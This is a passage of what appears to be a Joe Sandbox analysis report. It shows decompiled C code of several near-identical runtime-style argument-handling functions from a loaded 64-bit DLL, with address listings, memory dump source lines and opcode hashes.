                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x800174a0;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((short*)(_t67 - 8));
                                                                      				goto 0x80017570;
                                                                      				if (__eax - 0x63 <= 0) goto 0x800174e1;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((short*)(_t67 - 8)));
                                                                      				goto 0x80017572;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80017561;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x8001751d;
                                                                      				 *_t71 = 1;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x80017572;
                                                                      				_v24 = _t43;
                                                                      				r8d = 1;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180024C14(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x80017515;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t61, _t64, _t68, _t71, _t73, _t74,  *((short*)(_t67 - 8)));
                                                                      				goto 0x80017518;
                                                                      				 *_t71 =  *((short*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x180017474
                                                                      0x180017485
                                                                      0x180017488
                                                                      0x18001748a
                                                                      0x18001748f
                                                                      0x180017498
                                                                      0x18001749b
                                                                      0x1800174aa
                                                                      0x1800174ac
                                                                      0x1800174b2
                                                                      0x1800174b5
                                                                      0x1800174ba
                                                                      0x1800174be
                                                                      0x1800174c5
                                                                      0x1800174cb
                                                                      0x1800174d0
                                                                      0x1800174d5
                                                                      0x1800174dc
                                                                      0x1800174ec
                                                                      0x1800174ee
                                                                      0x1800174f8
                                                                      0x1800174fd
                                                                      0x180017505
                                                                      0x180017507
                                                                      0x18001750d
                                                                      0x180017512
                                                                      0x180017515
                                                                      0x18001751b
                                                                      0x18001751d
                                                                      0x180017521
                                                                      0x180017527
                                                                      0x180017531
                                                                      0x180017533
                                                                      0x180017537
                                                                      0x18001753a
                                                                      0x180017541
                                                                      0x180017545
                                                                      0x18001754c
                                                                      0x180017550
                                                                      0x180017555
                                                                      0x18001755a
                                                                      0x18001755f
                                                                      0x18001756d
                                                                      0x18001757c

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ff210611f35baceed40b755a8155feaec0b3e091df650ec16e6a187f790717c6
                                                                      • Instruction ID: 514e0866eb264e5243c65b8c61c68ba0f55c5c9934be27c7a1896d0a928ca928
                                                                      • Opcode Fuzzy Hash: ff210611f35baceed40b755a8155feaec0b3e091df650ec16e6a187f790717c6
                                                                      • Instruction Fuzzy Hash: DF316F72604B5486EBA58F29E0403AD77B1F388B9CF648125EB8D4B752DF36C596C704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E000000011800175D0(void* __eax, long long __rbx, long long __rcx, intOrPtr* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t43;
                                                                      				long long _t45;
                                                                      				intOrPtr _t58;
                                                                      				signed long long _t59;
                                                                      				intOrPtr _t62;
                                                                      				signed long long _t63;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				char* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t79;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x800175fb;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8b =  *((intOrPtr*)(_t68 - 8));
                                                                      				 *__rdx = r8b;
                                                                      				goto 0x800176c6;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001763c;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t58 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t58 + 0x2c)) = 0x16;
                                                                      				_t59 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t59;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t59, __rcx, _t68, __rdx, _t74, _t75, _t79);
                                                                      				goto 0x800176c8;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x800176ba;
                                                                      				_t45 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t59 + _t59 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80017676;
                                                                      				 *_t72 = 1;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t45;
                                                                      				dil = 1;
                                                                      				goto 0x800176c8;
                                                                      				_v24 = _t45;
                                                                      				r8d = 1;
                                                                      				_t69 = _t65;
                                                                      				if (E000000011800245A8(_t43, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x8001766e;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t62 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t62 + 0x2c)) = 0x16;
                                                                      				_t63 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t63;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t63, _t65, _t69, _t72, _t74, _t75, _t79);
                                                                      				goto 0x80017671;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t63 * 8))));
                                                                      				return 1;
                                                                      			}






















                                                                      0x1800175d0
                                                                      0x1800175e1
                                                                      0x1800175e4
                                                                      0x1800175e6
                                                                      0x1800175eb
                                                                      0x1800175ef
                                                                      0x1800175f3
                                                                      0x1800175f6
                                                                      0x180017605
                                                                      0x180017607
                                                                      0x18001760d
                                                                      0x180017610
                                                                      0x180017615
                                                                      0x180017619
                                                                      0x180017620
                                                                      0x180017626
                                                                      0x18001762b
                                                                      0x180017630
                                                                      0x180017637
                                                                      0x180017647
                                                                      0x180017649
                                                                      0x180017653
                                                                      0x180017657
                                                                      0x18001765f
                                                                      0x180017661
                                                                      0x180017667
                                                                      0x18001766b
                                                                      0x18001766e
                                                                      0x180017674
                                                                      0x180017676
                                                                      0x18001767a
                                                                      0x180017680
                                                                      0x18001768a
                                                                      0x18001768c
                                                                      0x180017690
                                                                      0x180017693
                                                                      0x18001769a
                                                                      0x18001769e
                                                                      0x1800176a5
                                                                      0x1800176a9
                                                                      0x1800176ae
                                                                      0x1800176b3
                                                                      0x1800176b8
                                                                      0x1800176c4
                                                                      0x1800176d2

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 631278753345c9a109010988ad6e72bd4afe9e9f5e66719719a320f1892f47d2
                                                                      • Instruction ID: 58aa26232159bc655de3cca96b5660e8d3a7da668e21d302c0b9c8280e618a9d
                                                                      • Opcode Fuzzy Hash: 631278753345c9a109010988ad6e72bd4afe9e9f5e66719719a320f1892f47d2
                                                                      • Instruction Fuzzy Hash: 70319172305F9486EB668F29D0403AD7BA0E39DB9CF248115EB8C4B752CF36C596CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E000000011800176D4(void* __eax, long long __rbx, long long __rcx, intOrPtr* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t43;
                                                                      				long long _t45;
                                                                      				intOrPtr _t58;
                                                                      				signed long long _t59;
                                                                      				intOrPtr _t62;
                                                                      				signed long long _t63;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				char* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t79;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x800176ff;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8b =  *((intOrPtr*)(_t68 - 8));
                                                                      				 *__rdx = r8b;
                                                                      				goto 0x800177ca;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80017740;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t58 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t58 + 0x2c)) = 0x16;
                                                                      				_t59 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t59;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t59, __rcx, _t68, __rdx, _t74, _t75, _t79);
                                                                      				goto 0x800177cc;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x800177be;
                                                                      				_t45 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t59 + _t59 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x8001777a;
                                                                      				 *_t72 = 1;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t45;
                                                                      				dil = 1;
                                                                      				goto 0x800177cc;
                                                                      				_v24 = _t45;
                                                                      				r8d = 1;
                                                                      				_t69 = _t65;
                                                                      				if (E000000011800247DC(_t43, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x80017772;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t62 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t62 + 0x2c)) = 0x16;
                                                                      				_t63 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t63;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t63, _t65, _t69, _t72, _t74, _t75, _t79);
                                                                      				goto 0x80017775;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t63 * 8))));
                                                                      				return 1;
                                                                      			}






















                                                                      0x1800176d4
                                                                      0x1800176e5
                                                                      0x1800176e8
                                                                      0x1800176ea
                                                                      0x1800176ef
                                                                      0x1800176f3
                                                                      0x1800176f7
                                                                      0x1800176fa
                                                                      0x180017709
                                                                      0x18001770b
                                                                      0x180017711
                                                                      0x180017714
                                                                      0x180017719
                                                                      0x18001771d
                                                                      0x180017724
                                                                      0x18001772a
                                                                      0x18001772f
                                                                      0x180017734
                                                                      0x18001773b
                                                                      0x18001774b
                                                                      0x18001774d
                                                                      0x180017757
                                                                      0x18001775b
                                                                      0x180017763
                                                                      0x180017765
                                                                      0x18001776b
                                                                      0x18001776f
                                                                      0x180017772
                                                                      0x180017778
                                                                      0x18001777a
                                                                      0x18001777e
                                                                      0x180017784
                                                                      0x18001778e
                                                                      0x180017790
                                                                      0x180017794
                                                                      0x180017797
                                                                      0x18001779e
                                                                      0x1800177a2
                                                                      0x1800177a9
                                                                      0x1800177ad
                                                                      0x1800177b2
                                                                      0x1800177b7
                                                                      0x1800177bc
                                                                      0x1800177c8
                                                                      0x1800177d6

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d02454c06a459b7d3d42cbc4ddf0e22002eb4ccf0e42a808d2ba5afc58924f64
                                                                      • Instruction ID: 69c2fb39bd1c9e8bce57df8cee77179622bf830ae4d98a6c9353c77432921733
                                                                      • Opcode Fuzzy Hash: d02454c06a459b7d3d42cbc4ddf0e22002eb4ccf0e42a808d2ba5afc58924f64
                                                                      • Instruction Fuzzy Hash: 1B319376209B8485EB668F29D0503AD7BA0E39DF8CF248115EB8C0B792CF36C196CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E000000011800197B8(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x800197e3;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t68 - 8));
                                                                      				goto 0x800198b0;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80019824;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x800198b2;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x800198a2;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x8001985e;
                                                                      				 *_t72 = 2;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x800198b2;
                                                                      				_v24 = _t44;
                                                                      				r8d = 2;
                                                                      				_t69 = _t65;
                                                                      				if (E000000011800245A8(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x80019856;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t62, _t65, _t69, _t72, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80019859;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x1800197b8
                                                                      0x1800197c9
                                                                      0x1800197cc
                                                                      0x1800197ce
                                                                      0x1800197d3
                                                                      0x1800197db
                                                                      0x1800197de
                                                                      0x1800197ed
                                                                      0x1800197ef
                                                                      0x1800197f5
                                                                      0x1800197f8
                                                                      0x1800197fd
                                                                      0x180019801
                                                                      0x180019808
                                                                      0x18001980e
                                                                      0x180019813
                                                                      0x180019818
                                                                      0x18001981f
                                                                      0x18001982f
                                                                      0x180019831
                                                                      0x18001983b
                                                                      0x18001983f
                                                                      0x180019847
                                                                      0x180019849
                                                                      0x18001984f
                                                                      0x180019853
                                                                      0x180019856
                                                                      0x18001985c
                                                                      0x18001985e
                                                                      0x180019862
                                                                      0x180019868
                                                                      0x180019872
                                                                      0x180019874
                                                                      0x180019878
                                                                      0x18001987b
                                                                      0x180019882
                                                                      0x180019886
                                                                      0x18001988d
                                                                      0x180019891
                                                                      0x180019896
                                                                      0x18001989b
                                                                      0x1800198a0
                                                                      0x1800198ad
                                                                      0x1800198bc

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0bb65c301b143c26c87f7e415c62068c8a6626b606e6fe468c7acbb598a0095e
                                                                      • Instruction ID: 9f4cda30b24114029b92276671bc7855f302e0bc175185835f59c9dbd70512df
                                                                      • Opcode Fuzzy Hash: 0bb65c301b143c26c87f7e415c62068c8a6626b606e6fe468c7acbb598a0095e
                                                                      • Instruction Fuzzy Hash: 4F319372605B9486EB618F29E04039D7BA0F39DB88F258119EB8D0B351CF36C196C704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E00000001180017800(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long __r8, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed int _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t43;
                                                                      				signed int _t45;
                                                                      				intOrPtr _t58;
                                                                      				signed long long _t59;
                                                                      				intOrPtr _t62;
                                                                      				signed long long _t63;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				signed int* _t72;
                                                                      				signed int _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_t79 = __r8;
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001782c;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t68 - 8) & 0x0000ffff;
                                                                      				 *__rdx = __r8;
                                                                      				goto 0x800178f9;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001786d;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t58 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t58 + 0x2c)) = 0x16;
                                                                      				_t59 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t59;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t59, __rcx, _t68, __rdx, _t74, _t75, __r8);
                                                                      				goto 0x800178fb;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x800178eb;
                                                                      				_t45 =  *(_t68 + 0x34);
                                                                      				r9b =  *(_t65 + 0x39);
                                                                      				_t72 = _t65 + (_t59 + _t59 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x800178a7;
                                                                      				 *_t72 = 1;
                                                                      				_t72[1] = r9b;
                                                                      				_t72[4] = _t45;
                                                                      				dil = 1;
                                                                      				goto 0x800178fb;
                                                                      				_v24 = _t45;
                                                                      				r8d = 1;
                                                                      				if (E000000011800245A8(_t43, _t65, _t65, _t72, _t73, _t80, _t81) != 0) goto 0x8001789f;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t62 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t62 + 0x2c)) = 0x16;
                                                                      				_t63 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t63;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t63, _t65, _t65, _t72, _t74, _t75, _t79);
                                                                      				goto 0x800178a2;
                                                                      				 *_t72 = _t63;
                                                                      				return 1;
                                                                      			}




















                                                                      0x180017800
                                                                      0x180017800
                                                                      0x180017811
                                                                      0x180017814
                                                                      0x180017816
                                                                      0x18001781b
                                                                      0x18001781f
                                                                      0x180017824
                                                                      0x180017827
                                                                      0x180017836
                                                                      0x180017838
                                                                      0x18001783e
                                                                      0x180017841
                                                                      0x180017846
                                                                      0x18001784a
                                                                      0x180017851
                                                                      0x180017857
                                                                      0x18001785c
                                                                      0x180017861
                                                                      0x180017868
                                                                      0x180017878
                                                                      0x18001787a
                                                                      0x180017884
                                                                      0x180017888
                                                                      0x180017890
                                                                      0x180017892
                                                                      0x180017898
                                                                      0x18001789c
                                                                      0x18001789f
                                                                      0x1800178a5
                                                                      0x1800178a7
                                                                      0x1800178ab
                                                                      0x1800178bb
                                                                      0x1800178bd
                                                                      0x1800178c1
                                                                      0x1800178c4
                                                                      0x1800178cb
                                                                      0x1800178cf
                                                                      0x1800178d6
                                                                      0x1800178da
                                                                      0x1800178df
                                                                      0x1800178e4
                                                                      0x1800178e9
                                                                      0x1800178f6
                                                                      0x180017905

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 28fe8bd8ac55ca792c8b24ba38183be43497ac5d8cd87d2374efbc4867073a47
                                                                      • Instruction ID: 8cfbc17812ff6b1184056812134a512a836a011f6b6d36b25f1f4b0ca4bd1ff1
                                                                      • Opcode Fuzzy Hash: 28fe8bd8ac55ca792c8b24ba38183be43497ac5d8cd87d2374efbc4867073a47
                                                                      • Instruction Fuzzy Hash: 8F315E72614B9486DBA58F29E0443AD7BA0E398B8CF248125EB8D4B752CF36C596DB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E000000011800198C0(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x800198eb;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t68 - 8));
                                                                      				goto 0x800199b8;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001992c;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x800199ba;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x800199aa;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
